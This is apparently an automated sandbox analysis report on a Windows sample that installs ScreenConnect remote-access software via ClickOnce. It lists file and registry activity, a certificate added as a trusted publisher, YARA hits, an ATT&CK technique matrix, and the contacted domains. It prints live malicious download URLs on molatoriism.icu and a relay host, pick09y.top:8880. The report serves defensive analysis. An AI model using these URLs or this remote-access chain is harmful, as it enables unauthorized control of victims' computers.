                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FF848F23642 CreateNamedPipeW,10_2_00007FF848F23642
Source: C:\Users\user\Desktop\pzPO97QouM.exe | Code function: 0_2_00F51806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F51806
Source: C:\Users\user\Desktop\pzPO97QouM.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.12.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\pzPO97QouM.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
Source: Yara match | File source: 5.0.ScreenConnect.WindowsClient.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: dfsvc.exe PID: 7120, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 3652, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 31 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 11 Native API | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 2 Windows Service | 2 Windows Service | 1 Install Root Certificate | Security Account Manager | 65 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 13 Process Injection | 1 Timestomp | NTDS | 71 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 71 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 71 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 13 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
[Behavior graph: Behavior Graph ID: 1551436, Sample: pzPO97QouM.exe, Startdate: 07/11/2024, Architecture: WINDOWS, Score: 60]

                  No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Core.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | | |
                  No Antivirus matches
                  No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| pick09y.top | 62.182.85.100 | true | false | | unknown |
| molatoriism.icu | 172.67.182.214 | true | false | | unknown |
| fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe | false | Avira URL Cloud: phishing | unknown |
| https://molatoriism.icu/Bin/ScreenConnect.Core.dll | false | Avira URL Cloud: phishing | unknown |
| https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.config | false | Avira URL Cloud: phishing | unknown |
| https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe | false | Avira URL Cloud: phishing | unknown |
| https://molatoriism.icu/Bin/ScreenConnect.ClientService.exe | false | Avira URL Cloud: phishing | unknown |
| https://molatoriism.icu/Bin/ScreenConnect.Client.dll | false | Avira URL Cloud: phishing | unknown |
| https://molatoriism.icu/Bin/ScreenConnect.Windows.dll | false | Avira URL Cloud: phishing | unknown |
| https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe | false | Avira URL Cloud: phishing | unknown |
| https://molatoriism.icu/Bin/ScreenConnect.ClientService.dll | false | Avira URL Cloud: phishing | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation
                                                      http://www.w3.ordfsvc.exe, 00000001.00000002.3886946834.0000023500658000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235006F0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350067B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.ver)svchost.exe, 00000003.00000002.3749275976.00000133B0C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://passport.net/tbsvchost.exe, 0000000D.00000002.3887830173.000001D225232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://molatoriism.icu/Bin/ScreenConnect.Client.applicationanifestInformatiScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: phishing
                                                            unknown
                                                            https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config(dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: phishing
                                                              unknown
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 0000000D.00000003.2645030441.000001D224B76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 00000005.00000002.2472709033.000000000310F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.application_dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.applicatiopzPO97QouM.exe, 00000000.00000002.3001524787.0000000000C4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxVsvchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://logilive.com/ppsecure/InlineClientsvchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000000D.00000002.3887186855.000001D2242D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClientdfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: phishing
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issueesvchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.applicationsdfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.applicationosoftdfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configFdfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustpsvchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.configUdfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: phishing
                                                                        unknown
                                                                        https://molatoriism.icu/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://molatoriism.icudfsvc.exe, 00000001.00000002.3886946834.000002350001A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350040E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350046F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicationScreenConnect.WindowsClient.exe, 00000005.00000002.2472519815.0000000001774000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2466646633.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmp, V0C4K20S.log.1.drfalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://molatoriism.icu/Bin/ScreenConnect.WindowsCdfsvc.exe, 00000001.00000002.3886946834.000002350040E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://molatoriism.icu/Bin/ScreenConnect.ClientService.dllA0dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: phishing
                                                                              unknown
                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&V0C4K20S.log.1.drfalse
                                                                                  • Avira URL Cloud: phishing
                                                                                  unknown
                                                                                  https://molatoriism.icu/Bin/ScreenConnect.Windows.dllkgdfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: phishing
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677210493.000001D2252C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://Passport.NET/STSsvchost.exe, 0000000D.00000003.2614528765.000001D224B74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D22427F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2614650893.000001D224B76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D224281000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://docs.oasis-open.org/wss/2svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exetdfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: phishing
                                                                                          unknown
                                                                                          http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.3886946834.0000023500089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://Passport.8svchost.exe, 0000000D.00000003.2630973958.000001D224B79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.w3.odfsvc.exe, 00000001.00000002.3886946834.0000023500658000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350061D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887186855.000001D224302000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://Passport.NET/tbsvchost.exe, 0000000D.00000002.3888112715.000001D22526A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.applications_e089ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: phishing
                                                                                                unknown
                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2519973205.000001D224B29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630990946.000001D224B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2614650893.000001D224B76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677210493.000001D2252C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationIEluYy4xQTA/BgNVScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: phishing
